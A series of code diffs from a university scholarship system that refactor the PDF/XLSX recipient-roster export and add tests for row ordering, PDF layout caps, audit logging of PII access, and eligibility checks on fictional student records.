+        Shared by the real table and the measurement probe so the height the cap
+        is derived from is the height actually rendered.
+        """
         group_row: List[Any] = [""] * len(_COLUMNS)
         label_row: List[Any] = [""] * len(_COLUMNS)
         span_commands: List[tuple] = []
@@ -483,6 +446,33 @@ class ManualDistributionExportService:
                     span_commands.append(("SPAN", (first, 0), (last, 0)))
                 for col in range(first, last + 1):
                     label_row[col] = pdf_paragraph(_COLUMNS[col][1], header_style)
+        return group_row, label_row, span_commands
+
+    def _measure_header_height(
+        self, *, col_widths: List[float], header_style: ParagraphStyle, page_height: float
+    ) -> float:
+        """Rendered height of the repeated 2-row header, in points.
+
+        Measured rather than assumed: the headers are long CJK strings whose wrap
+        depends on the column widths, and a guessed reserve that is even slightly
+        too small makes ``build_pdf`` raise ``LayoutError`` on ordinary free text.
+        """
+        group_row, label_row, span_commands = self._header_rows(header_style)
+        probe = Table([group_row, label_row], colWidths=col_widths)
+        probe.setStyle(TableStyle(base_pdf_table_style(header_rows=2) + span_commands))
+        _, height = probe.wrap(sum(col_widths), page_height)
+        return height
+
+    def _group_table(
+        self,
+        group: RecipientExportGroup,
+        *,
+        col_widths: List[float],
+        cell_max_height: float,
+        header_style: ParagraphStyle,
+        cell_style: ParagraphStyle,
+    ) -> Table:
+        group_row, label_row, span_commands = self._header_rows(header_style)
 
         data: List[list] = [group_row, label_row]
         for row in group.rows:

--- a/backend/app/services/manual_distribution_service.py
+++ b/backend/app/services/manual_distribution_service.py
@@ -24,11 +24,11 @@ from app.models.payment_roster import PaymentRoster, PaymentRosterItem, RosterSt
 from app.models.scholarship import ScholarshipConfiguration, ScholarshipSubTypeConfig
 from app.models.student import Academy
 from app.models.user import User, UserRole
-from app.services.manual_distribution_export_service import format_enrollment_date_roc
 from app.services.received_months_service import (
     calculate_received_months_bulk_async,
     get_imported_months_bulk_async,
 )
+from app.utils.student_snapshot_fields import format_enrollment_date_roc
 
 logger = logging.getLogger(__name__)
 

--- a/backend/app/services/manual_distribution_service.py
+++ b/backend/app/services/manual_distribution_service.py
@@ -24,6 +24,7 @@ from app.models.payment_roster import PaymentRoster, PaymentRosterItem, RosterSt
 from app.models.scholarship import ScholarshipConfiguration, ScholarshipSubTypeConfig
 from app.models.student import Academy
 from app.models.user import User, UserRole
+from app.services.manual_distribution_export_service import format_enrollment_date_roc
 from app.services.received_months_service import (
     calculate_received_months_bulk_async,
     get_imported_months_bulk_async,
@@ -1654,12 +1655,12 @@ class ManualDistributionService:
         return mapping.get(sub_type, sub_type)
 
     def _format_enrollment_date(self, student_data: dict) -> str:
-        """Format enrollment date as ROC calendar (民國年.月.日)."""
-        enroll_year = student_data.get("std_enrollyear", 0)
-        enroll_term = student_data.get("std_enrollterm", 1)
-        # Approximate: term 1 = September, term 2 = February
-        month = "09" if enroll_term == 1 else "02"
-        return f"{enroll_year}.{month}.01" if enroll_year else ""
+        """Format enrollment date as ROC calendar (民國年.月.日).
+
+        Delegates to the export module so the grid and the 分發名單 export can
+        never render the same student's date differently.
+        """
+        return format_enrollment_date_roc(student_data)
 
     async def _get_default_preferences(self, scholarship_type_id: int) -> list[str]:
         """

--- a/backend/app/tests/test_application_summary_export_helpers.py
+++ b/backend/app/tests/test_application_summary_export_helpers.py
@@ -10,10 +10,11 @@ constants are critical:
     Wrong MIME → browser downloads with wrong extension/icon,
     Excel may refuse to open.
 
-  - **_sanitise_filename_part(value)**: strips Windows-illegal
+  - **sanitise_filename_part(value)**: strips Windows-illegal
     characters from filename components. Department name → ZIP
     entry filename. A regression allowing `\\/:*?"<>|` would
-    break ZIP creation on Windows extraction.
+    break ZIP creation on Windows extraction. Defined in
+    app.utils.export_download and re-exported here.
 
   - **_sort_key(a)**: sorts applications with renewal applications
     first, then by std_stdcode, with missing/blank student codes
@@ -28,8 +29,8 @@ from types import SimpleNamespace
 from app.api.v1.endpoints.college_review.application_summary_export import (
     XLSX_MEDIA_TYPE,
     ZIP_MEDIA_TYPE,
-    _sanitise_filename_part,
     _sort_key,
+    sanitise_filename_part,
 )
 
 # ─── MIME type constants ─────────────────────────────────────────────
@@ -48,47 +49,47 @@ def test_zip_media_type_is_application_zip():
     assert ZIP_MEDIA_TYPE == "application/zip"
 
 
-# ─── _sanitise_filename_part ─────────────────────────────────────────
+# ─── sanitise_filename_part ─────────────────────────────────────────
 
 
 def test_sanitise_strips_backslash():
-    assert _sanitise_filename_part(r"foo\bar") == "foo_bar"
+    assert sanitise_filename_part(r"foo\bar") == "foo_bar"
 
 
 def test_sanitise_strips_forward_slash():
-    assert _sanitise_filename_part("foo/bar") == "foo_bar"
+    assert sanitise_filename_part("foo/bar") == "foo_bar"
 
 
 def test_sanitise_strips_all_windows_illegal_chars():
     # Pin: all 9 documented unsafe chars (\/:*?"<>|) replaced
     # with _. Critical — even ONE unsafe char in a ZIP entry
     # name breaks Windows extraction.
-    assert _sanitise_filename_part(r'a\b/c:d*e?f"g<h>i|j') == "a_b_c_d_e_f_g_h_i_j"
+    assert sanitise_filename_part(r'a\b/c:d*e?f"g<h>i|j') == "a_b_c_d_e_f_g_h_i_j"
 
 
 def test_sanitise_preserves_safe_characters():
     # Pin: alphanumerics, CJK, spaces, dashes pass through.
-    assert _sanitise_filename_part("人社院 - 2025") == "人社院 - 2025"
+    assert sanitise_filename_part("人社院 - 2025") == "人社院 - 2025"
 
 
 def test_sanitise_strips_trailing_whitespace():
     # Pin: .strip() applied at end. Common bug source — trailing
     # spaces in ZIP entry names confuse extractors.
-    assert _sanitise_filename_part("  hello  ") == "hello"
+    assert sanitise_filename_part("  hello  ") == "hello"
 
 
 def test_sanitise_empty_string_returns_untitled():
     # Pin: empty input → "untitled" fallback. Pin so a refactor
     # returning empty string doesn't produce a ZIP entry with
     # empty name (which most tools reject).
-    assert _sanitise_filename_part("") == "untitled"
+    assert sanitise_filename_part("") == "untitled"
 
 
 def test_sanitise_whitespace_only_returns_untitled():
     # Pin: whitespace-only input → "untitled" after .strip() →
     # empty → fallback. Defensive against department names that
     # are accidentally just spaces.
-    assert _sanitise_filename_part("   ") == "untitled"
+    assert sanitise_filename_part("   ") == "untitled"
 
 
 # ─── _sort_key ──────────────────────────────────────────────────────

--- a/backend/app/tests/test_distribution_summary_export_endpoint.py
+++ b/backend/app/tests/test_distribution_summary_export_endpoint.py
@@ -1,0 +1,494 @@
+"""Integration tests for GET /api/v1/manual-distribution/distribution-summary/export.
+
+Auth is mocked via ``app.dependency_overrides[get_current_admin_user]`` — same
+pattern as test_distribution_state_endpoint.py (both get_db functions must be
+overridden, see the admin_client fixture note there).
+
+Workbook assertions parse the xlsx with openpyxl, never scan response bytes —
+xlsx is zip-compressed, so byte-scanning false-negatives (see
+test_college_distribution_export_endpoint.py).
+"""
+
+import io
+
+import pytest
+import pytest_asyncio
+from httpx import AsyncClient
+from openpyxl import load_workbook
+from sqlalchemy.ext.asyncio import AsyncSession
+
+from app.core.deps import get_current_admin_user
+from app.main import app
+from app.models.application import Application
+from app.models.college_review import CollegeRanking, CollegeRankingItem
+from app.models.enums import ApplicationStatus, ReviewStage, SubTypeSelectionMode
+from app.models.scholarship import ScholarshipConfiguration, ScholarshipSubTypeConfig, ScholarshipType
+from app.models.user import User, UserRole, UserType
+from app.services.manual_distribution_export_service import CHECK_CLEAR, CHECK_FLAGGED
+
+ACADEMIC_YEAR = 114
+EXPORT_PATH = "/api/v1/manual-distribution/distribution-summary/export"
+
+
+@pytest_asyncio.fixture
+async def admin_user(db: AsyncSession) -> User:
+    user = User(
+        nycu_id="admin_export",
+        name="Export Admin",
+        email="export_admin@university.edu",
+        user_type=UserType.employee,
+        role=UserRole.admin,
+    )
+    db.add(user)
+    await db.commit()
+    await db.refresh(user)
+    return user
+
+
+@pytest_asyncio.fixture
+async def admin_client(client: AsyncClient, admin_user: User, db: AsyncSession):
+    from app.core.deps import get_db as core_get_db
+
+    async def override_admin():
+        return admin_user
+
+    async def override_db():
+        yield db
+
+    app.dependency_overrides[get_current_admin_user] = override_admin
+    app.dependency_overrides[core_get_db] = override_db
+    try:
+        yield client
+    finally:
+        app.dependency_overrides.pop(get_current_admin_user, None)
+        app.dependency_overrides.pop(core_get_db, None)
+
+
+@pytest_asyncio.fixture
+async def scholarship(db: AsyncSession) -> ScholarshipType:
+    sch = ScholarshipType(
+        code="export_sch",
+        name="博士生獎學金",
+        description="Fixture for distribution-summary export",
+    )
+    db.add(sch)
+    await db.commit()
+    await db.refresh(sch)
+
+    config = ScholarshipConfiguration(
+        scholarship_type_id=sch.id,
+        academic_year=ACADEMIC_YEAR,
+        semester=None,
+        config_name="Export Config",
+        config_code="export-config",
+        amount=40000,
+        currency="TWD",
+        is_active=True,
+        quotas={"nstc": {"I": 5}},
+    )
+    sub_type = ScholarshipSubTypeConfig(
+        scholarship_type_id=sch.id,
+        sub_type_code="nstc",
+        name="國科會",
+        is_active=True,
+    )
+    db.add_all([config, sub_type])
+    await db.commit()
+    return sch
+
+
+_COLLEGE_NAMES = {"I": "工學院", "E": "電機學院"}
+
+
+def _student_data(*, stdcode: str, name: str, identity: int = 1, college: str = "I") -> dict:
+    return {
+        "std_stdcode": stdcode,
+        "std_cname": name,
+        "std_nation": "中華民國",
+        "std_sex": 2,
+        "std_academyno": college,
+        "trm_academyname": _COLLEGE_NAMES[college],
+        "trm_depname": "土木工程學系",
+        "std_enrollyear": 113,
+        "std_enrollterm": 2,
+        "std_highestschname": "台灣大學",
+        "std_schoolid": 1,
+        "std_enrolltype": 9,
+        "std_identity": identity,
+        "std_studingstatus": 1,
+        "trm_studystatus": 1,
+    }
+
+
+async def _make_allocated_student(
+    db: AsyncSession,
+    *,
+    scholarship: ScholarshipType,
+    ranking: CollegeRanking,
+    suffix: str,
+    name: str,
+    rank_position: int,
+    allocation_config_id: int | None,
+    identity: int = 1,
+    allocated_sub_type: str = "nstc",
+    is_allocated: bool = True,
+    college: str = "I",
+) -> CollegeRankingItem:
+    user = User(
+        nycu_id=f"stu_exp_{suffix}",
+        name=name,
+        email=f"stu_exp_{suffix}@university.edu",
+        user_type=UserType.student,
+        role=UserRole.student,
+    )
+    db.add(user)
+    await db.commit()
+    await db.refresh(user)
+
+    application = Application(
+        app_id=f"APP-{ACADEMIC_YEAR}-0-9{suffix}",
+        user_id=user.id,
+        scholarship_type_id=scholarship.id,
+        scholarship_subtype_list=[allocated_sub_type],
+        sub_type_selection_mode=SubTypeSelectionMode.single,
+        sub_scholarship_type=allocated_sub_type,
+        academic_year=ACADEMIC_YEAR,
+        semester=None,
+        status=ApplicationStatus.approved,
+        review_stage=ReviewStage.quota_distributed,
+        agree_terms=True,
+        student_data=_student_data(stdcode=f"3123456{suffix}", name=name, identity=identity, college=college),
+        submitted_form_data={"fields": {"master_school_info": {"value": "台灣大學工學院土木工程學系"}}},
+    )
+    db.add(application)
+    await db.commit()
+    await db.refresh(application)
+
+    item = CollegeRankingItem(
+        ranking_id=ranking.id,
+        application_id=application.id,
+        rank_position=rank_position,
+        is_allocated=is_allocated,
+        allocated_sub_type=allocated_sub_type if is_allocated else None,
+        allocation_config_id=allocation_config_id,
+        status="allocated" if is_allocated else "ranked",
+    )
+    db.add(item)
+    await db.commit()
+    await db.refresh(item)
+    return item
+
+
+async def _make_ranking(db: AsyncSession, *, scholarship: ScholarshipType, executed: bool = True) -> CollegeRanking:
+    ranking = CollegeRanking(
+        scholarship_type_id=scholarship.id,
+        sub_type_code="default",
+        academic_year=ACADEMIC_YEAR,
+        semester=None,
+        is_finalized=True,
+        distribution_executed=executed,
+        ranking_status="finalized",
+    )
+    db.add(ranking)
+    await db.commit()
+    await db.refresh(ranking)
+    return ranking
+
+
+@pytest_asyncio.fixture
+async def seeded_distribution(db: AsyncSession, scholarship: ScholarshipType) -> CollegeRanking:
+    """Two allocated students (ranks 2 and 1, seeded out of order) + config quota."""
+    from sqlalchemy import select
+
+    config_id = (
+        (
+            await db.execute(
+                select(ScholarshipConfiguration.id).where(
+                    ScholarshipConfiguration.scholarship_type_id == scholarship.id
+                )
+            )
+        )
+        .scalars()
+        .first()
+    )
+    ranking = await _make_ranking(db, scholarship=scholarship)
+    await _make_allocated_student(
+        db,
+        scholarship=scholarship,
+        ranking=ranking,
+        suffix="02",
+        name="李陸生",
+        rank_position=2,
+        allocation_config_id=config_id,
+        identity=17,
+    )
+    await _make_allocated_student(
+        db,
+        scholarship=scholarship,
+        ranking=ranking,
+        suffix="01",
+        name="王小美",
+        rank_position=1,
+        allocation_config_id=config_id,
+    )
+    return ranking
+
+
+def _params(scholarship: ScholarshipType, **overrides):
+    params = {
+        "scholarship_type_id": scholarship.id,
+        "academic_year": ACADEMIC_YEAR,
+        "semester": "yearly",
+    }
+    params.update(overrides)
+    return params
+
+
+@pytest.mark.asyncio
+async def test_xlsx_export_headers_and_rows(admin_client, scholarship, seeded_distribution):
+    resp = await admin_client.get(EXPORT_PATH, params=_params(scholarship))
+    assert resp.status_code == 200
+    assert "spreadsheetml" in resp.headers["content-type"]
+    assert resp.content[:2] == b"PK"
+    assert resp.headers["content-disposition"].startswith("attachment; filename*=UTF-8''")
+    assert resp.headers["content-length"] == str(len(resp.content))
+
+    wb = load_workbook(io.BytesIO(resp.content))
+    # Sheet named after the ScholarshipSubTypeConfig label + consumed config's year.
+    assert wb.sheetnames == [f"國科會_{ACADEMIC_YEAR}"]
+    ws = wb.active
+    assert ws.cell(row=2, column=1).value == "序號"
+    assert ws.cell(row=2, column=2).value == "基本資料"
+
+    # Rows are ordered by rank_position — 王小美 (rank 1) first despite being
+    # seeded second — and 序號 restarts from 1.
+    first = [ws.cell(row=4, column=c).value for c in range(1, 14)]
+    assert first == [
+        1,
+        "工學院",
+        "土木工程學系",
+        "王小美",
+        "中華民國",
+        "女",
+        "台灣大學工學院土木工程學系",
+        "113.02.01",
+        "312345601",
+        None,
+        CHECK_CLEAR,
+        CHECK_CLEAR,
+        CHECK_CLEAR,
+    ]
+    # 陸生 (std_identity=17) row: cross-strait auto-check flags 有.
+    second = [ws.cell(row=5, column=c).value for c in range(1, 14)]
+    assert second[0] == 2
+    assert second[3] == "李陸生"
+    assert second[11] == CHECK_FLAGGED
+
+
+@pytest.mark.asyncio
+async def test_pdf_export_returns_pdf(admin_client, scholarship, seeded_distribution):
+    resp = await admin_client.get(EXPORT_PATH, params=_params(scholarship, format="pdf"))
+    assert resp.status_code == 200
+    assert resp.headers["content-type"] == "application/pdf"
+    assert resp.content.startswith(b"%PDF")
+    assert resp.headers["content-length"] == str(len(resp.content))
+
+
+@pytest.mark.asyncio
+async def test_unknown_sub_type_label_falls_back_to_raw_code(admin_client, scholarship, db):
+    ranking = await _make_ranking(db, scholarship=scholarship)
+    await _make_allocated_student(
+        db,
+        scholarship=scholarship,
+        ranking=ranking,
+        suffix="77",
+        name="自訂類別生",
+        rank_position=1,
+        allocation_config_id=None,
+        allocated_sub_type="custom_new_type",
+    )
+    resp = await admin_client.get(EXPORT_PATH, params=_params(scholarship))
+    assert resp.status_code == 200
+    wb = load_workbook(io.BytesIO(resp.content))
+    assert wb.sheetnames == [f"custom_new_type_{ACADEMIC_YEAR}"]
+
+
+@pytest.mark.asyncio
+async def test_no_finalized_distribution_is_404(admin_client, scholarship):
+    resp = await admin_client.get(EXPORT_PATH, params=_params(scholarship))
+    assert resp.status_code == 404
+    # The app-level HTTPException handler rewraps detail as {success, message}.
+    assert "尚未完成分發" in resp.json()["message"]
+
+
+@pytest.mark.asyncio
+async def test_distribution_without_allocated_students_is_404(admin_client, scholarship, db):
+    ranking = await _make_ranking(db, scholarship=scholarship)
+    await _make_allocated_student(
+        db,
+        scholarship=scholarship,
+        ranking=ranking,
+        suffix="55",
+        name="未分配生",
+        rank_position=1,
+        allocation_config_id=None,
+        is_allocated=False,
+    )
+    resp = await admin_client.get(EXPORT_PATH, params=_params(scholarship))
+    assert resp.status_code == 404
+    assert "尚無已分配" in resp.json()["message"]
+
+
+@pytest.mark.asyncio
+async def test_unknown_format_is_422(admin_client, scholarship, seeded_distribution):
+    resp = await admin_client.get(EXPORT_PATH, params=_params(scholarship, format="csv"))
+    assert resp.status_code == 422
+
+
+@pytest.mark.asyncio
+async def test_rows_are_ordered_by_college_then_rank(admin_client, scholarship, db):
+    """rank_position is scoped to ONE college's ranking, so ordering on it alone
+    interleaves colleges and the roster reads as if ranks were global."""
+    ranking_i = await _make_ranking(db, scholarship=scholarship)
+    for suffix, name, rank, college in [
+        ("31", "工一", 1, "I"),
+        ("32", "工二", 2, "I"),
+        ("41", "電一", 1, "E"),
+        ("42", "電二", 2, "E"),
+    ]:
+        await _make_allocated_student(
+            db,
+            scholarship=scholarship,
+            ranking=ranking_i,
+            suffix=suffix,
+            name=name,
+            rank_position=rank,
+            allocation_config_id=None,
+            college=college,
+        )
+
+    resp = await admin_client.get(EXPORT_PATH, params=_params(scholarship))
+    assert resp.status_code == 200
+    ws = load_workbook(io.BytesIO(resp.content)).active
+    names = [ws.cell(row=r, column=4).value for r in range(4, 8)]
+    seqs = [ws.cell(row=r, column=1).value for r in range(4, 8)]
+    # 學院 E sorts before I; within a college, by rank.
+    assert names == ["電一", "電二", "工一", "工二"]
+    assert seqs == [1, 2, 3, 4]
+
+
+@pytest.mark.asyncio
+async def test_multiple_groups_share_one_running_序號_in_sub_type_order(admin_client, scholarship, db):
+    ranking = await _make_ranking(db, scholarship=scholarship)
+    for suffix, name, rank, sub_type in [
+        ("61", "科會一", 1, "nstc"),
+        ("62", "科會二", 2, "nstc"),
+        ("63", "教部一", 1, "moe_1w"),
+    ]:
+        await _make_allocated_student(
+            db,
+            scholarship=scholarship,
+            ranking=ranking,
+            suffix=suffix,
+            name=name,
+            rank_position=rank,
+            allocation_config_id=None,
+            allocated_sub_type=sub_type,
+        )
+
+    resp = await admin_client.get(EXPORT_PATH, params=_params(scholarship))
+    assert resp.status_code == 200
+    wb = load_workbook(io.BytesIO(resp.content))
+    # Groups sort by sub_type code: moe_1w before nstc. moe_1w has no
+    # ScholarshipSubTypeConfig row here, so it falls back to the raw code.
+    assert wb.sheetnames == [f"moe_1w_{ACADEMIC_YEAR}", f"國科會_{ACADEMIC_YEAR}"]
+
+    moe = wb[f"moe_1w_{ACADEMIC_YEAR}"]
+    assert [moe.cell(row=4, column=1).value, moe.cell(row=4, column=4).value] == [1, "教部一"]
+    assert moe.cell(row=5, column=1).value is None  # only one row in this group
+
+    # 序號 is ONE running number across the whole document, not per sheet: the
+    # 名冊 is filed as a single document, so the 承辦人 can cite 序號 N unambiguously.
+    nstc = wb[f"國科會_{ACADEMIC_YEAR}"]
+    assert [nstc.cell(row=r, column=1).value for r in (4, 5)] == [2, 3]
+    assert [nstc.cell(row=r, column=4).value for r in (4, 5)] == ["科會一", "科會二"]
+
+
+@pytest.mark.asyncio
+async def test_export_writes_a_pii_access_audit_log(admin_client, scholarship, seeded_distribution, db, admin_user):
+    """The file carries 國籍/性別/碩士畢業校系 + 學籍 flags for identified students,
+    so the bulk export must be attributable."""
+    from sqlalchemy import select
+
+    from app.models.audit_log import AuditAction, AuditLog
+
+    resp = await admin_client.get(EXPORT_PATH, params=_params(scholarship, format="pdf"))
+    assert resp.status_code == 200
+
+    logs = (await db.execute(select(AuditLog).where(AuditLog.action == AuditAction.pii_access.value))).scalars().all()
+    assert len(logs) == 1
+    entry = logs[0]
+    assert entry.user_id == admin_user.id
+    assert entry.resource_id == str(scholarship.id)
+    assert entry.meta_data["export_format"] == "pdf"
+    assert entry.meta_data["record_count"] == 2
+    assert len(entry.meta_data["application_ids"]) == 2
+
+
+@pytest.mark.asyncio
+async def test_failed_export_writes_no_audit_log(admin_client, scholarship, db):
+    """A 404 must not leave a pii_access record claiming data left the system."""
+    from sqlalchemy import select
+
+    from app.models.audit_log import AuditAction, AuditLog
+
+    resp = await admin_client.get(EXPORT_PATH, params=_params(scholarship))
+    assert resp.status_code == 404
+    logs = (await db.execute(select(AuditLog).where(AuditLog.action == AuditAction.pii_access.value))).scalars().all()
+    assert logs == []
+
+
+@pytest.mark.asyncio
+async def test_json_summary_endpoint_still_serves_the_same_students(admin_client, scholarship, seeded_distribution):
+    """Regression: the JSON endpoint was refactored onto the shared loader."""
+    resp = await admin_client.get("/api/v1/manual-distribution/distribution-summary", params=_params(scholarship))
+    assert resp.status_code == 200
+    body = resp.json()
+    assert body["success"] is True
+    assert body["data"]["total_allocated"] == 2
+    assert len(body["data"]["groups"]) == 1
+    group = body["data"]["groups"][0]
+    assert set(group) == {"sub_type", "allocation_config_id", "allocation_year", "count", "students"}
+    assert group["sub_type"] == "nstc"
+    assert group["allocation_year"] == ACADEMIC_YEAR
+    assert group["count"] == 2
+
+    # Pin the per-student payload the panel consumes — this endpoint moved onto a
+    # loader shared with the export, so a dropped key must fail here, not in the UI.
+    students = sorted(group["students"], key=lambda s: s["rank_position"])
+    assert set(students[0]) == {
+        "ranking_item_id",
+        "application_id",
+        "student_name",
+        "student_id",
+        "college_code",
+        "college_name",
+        "department_name",
+        "rank_position",
+        "college_rejected",
+        "is_supplementary",
+        "is_renewal",
+        "renewal_year",
+    }
+    first = students[0]
+    assert first["student_name"] == "王小美"
+    assert first["student_id"] == "312345601"
+    assert first["college_code"] == "I"
+    assert first["college_name"] == "工學院"
+    assert first["department_name"] == "土木工程學系"
+    assert first["rank_position"] == 1
+    assert first["college_rejected"] is False
+    assert first["is_supplementary"] is False
+    assert first["is_renewal"] is False
+    assert first["renewal_year"] is None
+    assert [s["student_name"] for s in students] == ["王小美", "李陸生"]

--- a/backend/app/tests/test_manual_distribution_export_service.py
+++ b/backend/app/tests/test_manual_distribution_export_service.py
@@ -446,8 +446,49 @@ class TestBuildPdf:
         assert svc.build_pdf(groups=[_group([row])], title="T & <U>").startswith(b"%PDF")
 
     def test_overlong_cell_shrinks_instead_of_raising_layout_error(self):
-        """A reportlab Table cannot split one row across pages — KeepInFrame must
-        absorb a pathological 4000-char free-text value."""
+        """A reportlab Table cannot split one row across pages, so an uncapped
+        overlong cell raises LayoutError and fails the WHOLE export.
+
+        Swept across lengths on purpose: a single magic length is not a test of
+        the cap. The original 4000-char value happened to shrink just under a
+        too-generous cap while 700, 2000 and 5000 all raised — so the assertion
+        passed while the guard was broken.
+        """
         svc = ManualDistributionExportService()
-        row = _sample_row(std_cname="超長姓名" * 1000)
-        assert svc.build_pdf(groups=[_group([row])], title="T").startswith(b"%PDF")
+        for length in (100, 500, 700, 1000, 2000, 4000, 5000, 20000):
+            for field in ("std_cname", "trm_depname", "std_nation"):
+                row = _sample_row(**{field: "超" * length})
+                payload = svc.build_pdf(groups=[_group([row])], title="T")
+                assert payload.startswith(b"%PDF"), f"{field} x{length}"
+
+    def test_cell_cap_leaves_room_for_the_real_two_row_header(self):
+        """The cap must come from the MEASURED header, not a single-header-row
+        constant: this table repeats two header rows on every continuation page.
+        """
+        from reportlab.lib.pagesizes import A4, landscape
+
+        from app.services.export_table_chassis import (
+            PDF_FRAME_PADDING_PT,
+            PDF_MARGIN_PT,
+            make_pdf_styles,
+            pdf_cell_max_height,
+            pdf_col_widths,
+        )
+        from app.services.manual_distribution_export_service import _COL_WEIGHTS
+        from app.services.pdf_fonts import ensure_cjk_font
+
+        ensure_cjk_font()
+        page_width, page_height = landscape(A4)
+        col_widths = pdf_col_widths(_COL_WEIGHTS, page_width - (PDF_MARGIN_PT * 2))
+        _, header_style, _unused = make_pdf_styles("RecipientRoster")
+
+        svc = ManualDistributionExportService()
+        header_height = svc._measure_header_height(
+            col_widths=col_widths, header_style=header_style, page_height=page_height
+        )
+        cap = pdf_cell_max_height(page_height, header_height=header_height)
+
+        # What a continuation page actually offers a single body row.
+        available = page_height - (PDF_MARGIN_PT * 2) - PDF_FRAME_PADDING_PT - header_height
+        assert 0 < cap <= available, f"cap {cap} must fit {available}"
+        assert header_height > 40, "a 2-row CJK header should measure well over one row"

--- a/backend/app/tests/test_manual_distribution_export_service.py
+++ b/backend/app/tests/test_manual_distribution_export_service.py
@@ -1,0 +1,453 @@
+"""Unit tests for the admin 分發名單 (受獎名冊) export renderer.
+
+Sync tests -> unit lane. Pure rendering: no DB, no HTTP. Applications are
+duck-typed SimpleNamespace stubs carrying only ``student_data`` /
+``submitted_form_data``, mirroring test_manual_distribution_pure_helpers.py.
+"""
+
+import io
+from types import SimpleNamespace
+
+from openpyxl import load_workbook
+
+from app.services.manual_distribution_export_service import (
+    AUTO_CHECK_GROUP,
+    CHECK_CLEAR,
+    CHECK_FLAGGED,
+    CHECK_UNVERIFIABLE,
+    HEADERS,
+    ManualDistributionExportService,
+    RecipientExportGroup,
+    build_recipient_row,
+    derive_cross_strait_check,
+    derive_employment_check,
+    derive_study_status_check,
+    format_enrollment_date_roc,
+)
+
+
+def _student_data(**overrides):
+    base = {
+        "std_stdcode": "312345611",
+        "std_cname": "王小美",
+        "std_nation": "中華民國",
+        "std_sex": 2,
+        "std_academyno": "I",
+        "trm_academyname": "工學院",
+        "trm_depname": "土木工程學系",
+        "std_enrollyear": 113,
+        "std_enrollterm": 2,
+        "std_highestschname": "台灣大學",
+        "std_schoolid": 1,
+        "std_enrolltype": 9,
+        "std_identity": 1,
+        "std_studingstatus": 1,
+        "trm_studystatus": 1,
+        "std_overseaplace": "",
+    }
+    base.update(overrides)
+    return base
+
+
+def _application(student_data=None, form_fields=None):
+    return SimpleNamespace(
+        student_data=student_data,
+        submitted_form_data={"fields": form_fields} if form_fields is not None else None,
+    )
+
+
+def _group(rows, label="國科會", code="nstc", year=114):
+    return RecipientExportGroup(label=label, sub_type_code=code, allocation_year=year, rows=rows)
+
+
+def _sample_row(seq=1, **overrides):
+    fields = {"master_school_info": {"value": "台灣大學工學院土木工程學系"}}
+    return build_recipient_row(seq, _application(_student_data(**overrides), fields))
+
+
+# --------------------------------------------------------------------------- #
+# Eligibility derivations
+# --------------------------------------------------------------------------- #
+
+
+class TestEmploymentCheck:
+    def test_in_service_school_identity_flags(self):
+        assert derive_employment_check(_student_data(std_schoolid=2)) == CHECK_FLAGGED
+
+    def test_in_service_enroll_types_flag(self):
+        assert derive_employment_check(_student_data(std_enrolltype=2)) == CHECK_FLAGGED
+        assert derive_employment_check(_student_data(std_enrolltype=5)) == CHECK_FLAGGED
+
+    def test_regular_student_is_clear(self):
+        assert derive_employment_check(_student_data(std_schoolid=1, std_enrolltype=4)) == CHECK_CLEAR
+
+    def test_numeric_string_codes_are_coerced(self):
+        assert derive_employment_check(_student_data(std_schoolid="2")) == CHECK_FLAGGED
+
+    def test_missing_both_fields_is_unverifiable(self):
+        assert derive_employment_check({}) == CHECK_UNVERIFIABLE
+
+    def test_one_field_present_is_enough_to_clear(self):
+        assert derive_employment_check({"std_schoolid": 1}) == CHECK_CLEAR
+
+    def test_neighbouring_codes_are_not_flagged(self):
+        """Negative boundary: widening the flagged set must fail CI.
+        school_identities 3-8 (選讀/交換/外校/…) and enroll types 1/3/4/6/7 are
+        NOT 在職."""
+        for schoolid in (3, 4, 5, 6, 7, 8):
+            assert derive_employment_check(_student_data(std_schoolid=schoolid)) == CHECK_CLEAR, schoolid
+        for enroll in (1, 3, 4, 6, 7, 8, 9, 10, 11):
+            assert derive_employment_check(_student_data(std_enrolltype=enroll)) == CHECK_CLEAR, enroll
+
+    def test_float_typed_codes_are_coerced_not_downgraded(self):
+        """A JSON number can arrive as 2.0; int("2.0") raises, which would
+        silently downgrade a real 有 to 無法檢核."""
+        assert derive_employment_check({"std_schoolid": 2.0}) == CHECK_FLAGGED
+        assert derive_employment_check({"std_schoolid": "2.0"}) == CHECK_FLAGGED
+
+
+class TestCrossStraitCheck:
+    def test_mainland_identity_code_flags(self):
+        assert derive_cross_strait_check(_student_data(std_identity=17)) == CHECK_FLAGGED
+
+    def test_mainland_enroll_type_flags(self):
+        assert derive_cross_strait_check(_student_data(std_enrolltype=17)) == CHECK_FLAGGED
+
+    def test_mainland_nationality_text_flags(self):
+        assert derive_cross_strait_check(_student_data(std_nation="中國大陸")) == CHECK_FLAGGED
+        assert derive_cross_strait_check(_student_data(std_nation="中華人民共和國")) == CHECK_FLAGGED
+
+    def test_hk_macau_nationality_text_flags(self):
+        """港澳 has NO SIS identity code — the free-text 國籍/僑居地 is the only signal."""
+        assert derive_cross_strait_check(_student_data(std_nation="香港")) == CHECK_FLAGGED
+        assert derive_cross_strait_check(_student_data(std_overseaplace="澳門")) == CHECK_FLAGGED
+
+    def test_roc_nationality_is_clear_not_a_substring_false_positive(self):
+        """中華民國 must not fuzzy-match 中國 / 中華人民共和國."""
+        assert derive_cross_strait_check(_student_data()) == CHECK_CLEAR
+
+    def test_foreign_student_is_clear(self):
+        assert derive_cross_strait_check(_student_data(std_nation="美國", std_identity=4)) == CHECK_CLEAR
+
+    def test_missing_everything_is_unverifiable(self):
+        assert derive_cross_strait_check({}) == CHECK_UNVERIFIABLE
+
+    def test_partial_mainland_spellings_are_caught_in_either_field(self):
+        """SIS free text is not a controlled vocabulary, so match substrings —
+        and match 國籍 and 僑居地 identically (the asymmetry let a bare "中國"
+        through 國籍 while 僑居地 caught it)."""
+        for value in ("中國", "中國大陸", "大陸地區", "中華人民共和國香港特別行政區", "香港", "澳門"):
+            assert derive_cross_strait_check(_student_data(std_nation=value)) == CHECK_FLAGGED, f"nation={value}"
+            assert (
+                derive_cross_strait_check(_student_data(std_nation="", std_overseaplace=value)) == CHECK_FLAGGED
+            ), f"oversea={value}"
+
+    def test_roc_nationality_is_not_a_substring_false_positive(self):
+        """中華民國 must survive every keyword: substrings are contiguous, so it
+        contains neither 中國 (中華/華民/民國) nor 大陸."""
+        assert derive_cross_strait_check(_student_data(std_nation="中華民國")) == CHECK_CLEAR
+        assert (
+            derive_cross_strait_check(_student_data(std_nation="中華民國", std_overseaplace="中華民國")) == CHECK_CLEAR
+        )
+
